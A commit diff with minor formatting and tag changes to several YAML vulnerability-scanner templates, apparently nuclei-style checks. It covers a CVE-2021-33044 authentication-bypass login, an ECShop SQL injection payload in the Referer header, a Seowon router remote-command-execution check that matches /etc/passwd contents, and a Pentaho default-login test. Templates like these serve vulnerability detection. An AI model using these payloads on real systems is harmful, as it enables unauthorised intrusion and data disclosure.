misc updates

cves/2021/CVE-2021-33044.yaml

@@ -25,8 +25,8 @@ requests:
         Connection: close
         X-Requested-With: XMLHttpRequest
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-        Origin: http://{{Hostname}}/
+        Origin: {{BaseURL}}
-        Referer: http://{{Hostname}}/
+        Referer: {{BaseURL}}
 
         {"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}
 
@@ -40,10 +40,10 @@ requests:
       - type: word
         part: body
         words:
-          - "\"result\":true"
+          - '"result":true'
-          - "id"
+          - 'id'
-          - "params"
+          - 'params'
-          - "session"
+          - 'session'
         condition: and
 
     extractors:

default-logins/pentaho/pentaho-default-login.yaml

@@ -6,7 +6,7 @@ info:
   severity: high
   metadata:
     shodan-query: 'pentaho'
-  tags: pentaho,default-login,panel
+  tags: pentaho,default-login
 
 requests:
   - raw:

vulnerabilities/other/ecshop-sqli.yaml

@@ -7,7 +7,7 @@ info:
   reference:
     - https://titanwolf.org/Network/Articles/Article?AID=af15bee8-7afc-4bb2-9761-a7d61210b01a
     - https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html
-  tags: sqli,php,cms,ecshop
+  tags: sqli,php,ecshop
 
 requests:
   - raw:
@@ -15,10 +15,7 @@ requests:
         GET /user.php?act=login HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
         Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}
-        Accept-Encoding: gzip, deflate
-        Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
 
     matchers:
       - type: word

vulnerabilities/other/seowon-router-rce.yaml

@@ -13,9 +13,6 @@ requests:
       - |
         POST / HTTP/1.1
         Host: {{Hostname}}
-        Accept: */*
-        Accept-Language: en-US,en;q=0.5
-        Accept-Encoding: gzip, deflate
         Content-Type: application/x-www-form-urlencoded
         Referer: {{BaseURL}}/diagnostic.html?t=201701020919
         Cookie: product=cpe; cpe_buildTime=201701020919; vendor=mobinnet; connType=lte; cpe_multiPdnEnable=1; cpe_lang=en; cpe_voip=0; cpe_cwmpc=1; cpe_snmp=1; filesharing=0; cpe_switchEnable=0; cpe_IPv6Enable=0; cpe_foc=0; cpe_vpn=1; cpe_httpsEnable=0; cpe_internetMTUEnable=0; cpe_opmode=lte; sessionTime=1631653385102; cpe_login=admin
@@ -26,9 +23,9 @@ requests:
     matchers-condition: and
     matchers:
       - type: regex
+        part: body
         regex:
           - "root:.*:0:0"
-        part: body
 
       - type: status
         status: